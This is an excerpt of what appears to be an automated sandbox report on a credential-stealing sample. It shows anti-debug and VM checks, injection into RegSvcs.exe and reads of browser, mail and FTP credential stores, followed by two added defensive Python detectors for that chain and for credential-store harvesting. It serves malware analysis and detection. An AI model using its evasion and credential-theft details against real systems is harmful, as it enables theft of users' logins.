                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3A2B
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_005B3D4E
                    Source: C:\Users\user\AppData\Local\seskin\troopwise.exeCode function: 1_2_005BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_005BBF27
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E84AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599510Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.1903502988.0000000005D01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                    Source: RegSvcs.exe, 00000005.00000002.4204586491.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000005.00000002.4207610159.0000000006522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                    Source: RegSvcs.exe, 00000005.00000002.4204586491.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: troopwise.exe, 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: troopwise.exe, 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: wscript.exe, 00000003.00000002.1875395771.0000017896515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}|
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EF41FD BlockInput,0_2_00EF41FD
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E83B4C
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00EB5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00EB5CCC
                    Source: C:\Users\user\Desktop\LfZAz7DQzo.exeCode function: 0_2_00F98070 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00F98070
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_01193328 mov eax, dword ptr fs:[00000030h] 0_2_01193328
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_011932C8 mov eax, dword ptr fs:[00000030h] 0_2_011932C8
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_01191C68 mov eax, dword ptr fs:[00000030h] 0_2_01191C68
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_00FE1690 mov eax, dword ptr fs:[00000030h] 1_2_00FE1690
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_00FE2CF0 mov eax, dword ptr fs:[00000030h] 1_2_00FE2CF0
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_00FE2D50 mov eax, dword ptr fs:[00000030h] 1_2_00FE2D50
(The six fs:[30h] reads above fetch the PEB pointer from the TEB. That is the usual first step of an inline PEB.BeingDebugged or NtGlobalFlag check, an anti-debug test done without calling IsDebuggerPresent and therefore invisible to API hooks.)
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ED81F7
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EAA395
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EAA364 SetUnhandledExceptionFilter,0_2_00EAA364
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_0057A364 SetUnhandledExceptionFilter,1_2_0057A364
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Code function: 1_2_0057A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0057A395
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6FA008
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1198008
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00ED8C93 LogonUserW,0_2_00ED8C93
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E83B4C
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E84A35
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EE4EF5 mouse_event,0_2_00EE4EF5
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\LfZAz7DQzo.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\seskin\troopwise.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe"
Source: C:\Users\user\AppData\Local\seskin\troopwise.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\seskin\troopwise.exe"
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ED81F7
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00EE4C03
Source: LfZAz7DQzo.exe, 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp, troopwise.exe, 00000001.00000002.1764206020.0000000000605000.00000040.00000001.01000000.00000004.sdmp, troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: LfZAz7DQzo.exe, troopwise.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EA886B cpuid 0_2_00EA886B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EB50D7
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EC2230 GetUserNameW,0_2_00EC2230
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00EB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EB418A
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Code function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E84AFE
Source: C:\Users\user\Desktop\LfZAz7DQzo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
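The process-tree evidence above is the shape a hunting query should key on: wscript.exe starts troopwise.exe from a user-writable directory, troopwise.exe starts RegSvcs.exe with a command line that names a different executable, then maps an execute/read/write section into RegSvcs.exe and writes its memory. The Python below is an added example, not code from the Joe Sandbox report: it triages constructed Sysmon-style events (Event ID 1 process creation, Event ID 10 process access) modelled on this report's chain and returns a reason per suspicious event. Field names follow Sysmon; the .NET host binaries other than RegSvcs.exe, the user-writable path list, the PIDs and the benign control event are assumptions.

```python
"""Triage of Sysmon-style events for the injection chain seen in this report.

Added example, not code from the Joe Sandbox report. EVENTS is constructed to
mirror the report's process tree (wscript.exe -> troopwise.exe -> RegSvcs.exe)
plus one benign control; PIDs are invented.
"""
import ntpath
import re

# RegSvcs.exe is the host observed in this report; the other .NET utilities are
# an assumption (they are abused the same way) and can be trimmed to taste.
NET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Sysmon GrantedAccess bits: PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
WRITE_MASK = 0x0002 | 0x0008 | 0x0020

# Directories a standard user can write to (assumption; extend for your estate).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads|Desktop)\\", re.I)

EVENTS = [
    {"EventID": 1, "ProcessId": 1001,
     "Image": r"C:\Users\user\AppData\Local\seskin\troopwise.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\seskin\troopwise.exe" ',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"EventID": 1, "ProcessId": 1002,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\Desktop\LfZAz7DQzo.exe"',  # argv[0] is not RegSvcs.exe
     "ParentImage": r"C:\Users\user\AppData\Local\seskin\troopwise.exe"},
    {"EventID": 10, "TargetProcessId": 1002, "GrantedAccess": 0x1FFFFF,
     "SourceImage": r"C:\Users\user\AppData\Local\seskin\troopwise.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
    # Benign control (constructed): an installer under Program Files registering a COM+ assembly.
    {"EventID": 1, "ProcessId": 1003,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "C:\Program Files\Vendor\Component.dll"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
]


def basename(path):
    return ntpath.basename(path).lower()


def argv0(cmdline):
    """First token of a Windows command line, honouring a double-quoted path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def in_user_writable(path):
    return USER_WRITABLE.search(path) is not None


def check_process_create(ev):
    """Reasons a process-creation event looks like this report's chain."""
    reasons = []
    image, parent = ev["Image"], ev["ParentImage"]
    if basename(image) in NET_HOSTS:
        if in_user_writable(parent):
            reasons.append("net-host-from-user-writable-parent")
        if basename(argv0(ev["CommandLine"])) != basename(image):
            # the injector supplied a command line naming a different executable
            reasons.append("cmdline-image-mismatch")
    if basename(parent) in SCRIPT_HOSTS and in_user_writable(image):
        reasons.append("script-host-spawns-user-writable-exe")
    return reasons


def check_process_access(ev):
    """A user-writable binary opening a .NET host with write/thread rights."""
    if (basename(ev["TargetImage"]) in NET_HOSTS
            and in_user_writable(ev["SourceImage"])
            and ev["GrantedAccess"] & WRITE_MASK):
        return ["user-writable-source-writes-net-host-memory"]
    return []


def triage(events):
    """Return (pid, reason) pairs in event order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            pid, reasons = ev["ProcessId"], check_process_create(ev)
        elif ev["EventID"] == 10:
            pid, reasons = ev["TargetProcessId"], check_process_access(ev)
        else:
            continue
        findings.extend((pid, r) for r in reasons)
    return findings


if __name__ == "__main__":
    for pid, reason in triage(EVENTS):
        print(f"pid {pid}: {reason}")
```

The command-line check is the cheapest of the three and survives renaming of the dropper: a legitimately launched RegSvcs.exe carries its own path as argv[0], whereas a hollowed one carries whatever the injector passed to CreateProcess. The benign control shows why the parent-directory test must be paired with it rather than used alone: installers do legitimately spawn RegSvcs.exe.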

                    Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1889523991.0000000002A2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4204586491.0000000003306000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6164, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: troopwise.exe | Binary or memory string: WIN_81
Source: troopwise.exe | Binary or memory string: WIN_XP
Source: troopwise.exe | Binary or memory string: WIN_XPe
Source: troopwise.exe | Binary or memory string: WIN_VISTA
Source: troopwise.exe | Binary or memory string: WIN_7
Source: troopwise.exe | Binary or memory string: WIN_8
Source: troopwise.exe, 00000004.00000002.1886503345.0000000000605000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match | File source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.troopwise.exe.1be0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.troopwise.exe.1be0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.troopwise.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.troopwise.exe.24c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1887838994.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1889523991.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886565219.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1767587810.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: troopwise.exe PID: 7128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7164, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: troopwise.exe PID: 4048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6164, type: MEMORYSTR
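The file and registry accesses listed in this section (browser Login Data files, Firefox-family and Thunderbird profiles.ini, the FTP Navigator list, the WinSCP sessions key, the Windows Messaging Subsystem and IncrediMail keys) all come from one RegSvcs.exe process. No single access is suspicious on its own, since each store's owning application reads it routinely; the useful signal is breadth, one process touching several unrelated credential-store families in a short window. The Python below is an added example, not code from the Joe Sandbox report: it classifies constructed file/registry-open events (modelled on the paths above) into store families and flags a process that hits at least two families within a time window. The family grouping, the two thresholds, the event shape, the PIDs and the benign controls are assumptions.

```python
"""Breadth-of-access detector for credential-store harvesting.

Added example, not code from the Joe Sandbox report. EVENTS is constructed from
the file and registry paths the report lists for RegSvcs.exe, plus two benign
controls (a browser and a mail client reading their own stores). PIDs and
timestamps are invented.
"""
import re
from collections import defaultdict

# Credential stores grouped by family (the grouping is an assumption).
STORES = [
    ("browser", re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\[^\\]+\\Login Data$", re.I)),
    ("browser", re.compile(r"\\(Mozilla\\Firefox|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$", re.I)),
    ("mail", re.compile(r"\\Thunderbird\\profiles\.ini$", re.I)),
    ("mail", re.compile(r"\\Windows Messaging Subsystem\\Profiles$", re.I)),
    ("mail", re.compile(r"\\IncrediMail\\Identities$", re.I)),
    ("ftp", re.compile(r"\\FTP Navigator\\Ftplist\.txt$", re.I)),
    ("ftp", re.compile(r"\\Martin Prikryl\\WinSCP 2\\Sessions$", re.I)),
]

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# Constructed events: (timestamp seconds, pid, image, kind, path)
EVENTS = [
    (10.0, 3001, REGSVCS, "reg", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (10.4, 3001, REGSVCS, "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (10.5, 3001, REGSVCS, "file", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (10.9, 3001, REGSVCS, "file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (11.2, 3001, REGSVCS, "file", r"C:\FTP Navigator\Ftplist.txt"),
    (11.5, 3001, REGSVCS, "file", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (11.6, 3001, REGSVCS, "reg", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    (11.7, 3001, REGSVCS, "reg", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (12.0, 3001, REGSVCS, "file", r"C:\Windows\System32\mswsock.dll"),  # noise, not a store
    (50.0, 3002, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (60.0, 3003, r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe", "file",
     r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
]


def classify(path):
    """Family of the credential store at `path`, or None if it is not one."""
    for family, pattern in STORES:
        if pattern.search(path):
            return family
    return None


def find_stealers(events, min_families=2, window=30.0):
    """{pid: (image, sorted families)} for processes that touch at least
    `min_families` distinct store families within `window` seconds."""
    per_pid = defaultdict(lambda: {"image": None, "families": set(), "first": None, "last": None})
    for ts, pid, image, _kind, path in events:
        family = classify(path)
        if family is None:
            continue
        rec = per_pid[pid]
        rec["image"] = image
        rec["families"].add(family)
        rec["first"] = ts if rec["first"] is None else min(rec["first"], ts)
        rec["last"] = ts if rec["last"] is None else max(rec["last"], ts)
    return {pid: (rec["image"], sorted(rec["families"]))
            for pid, rec in per_pid.items()
            if len(rec["families"]) >= min_families and rec["last"] - rec["first"] <= window}


if __name__ == "__main__":
    for pid, (image, families) in find_stealers(EVENTS).items():
        print(f"pid {pid} ({image}) touched {', '.join(families)} stores")
```

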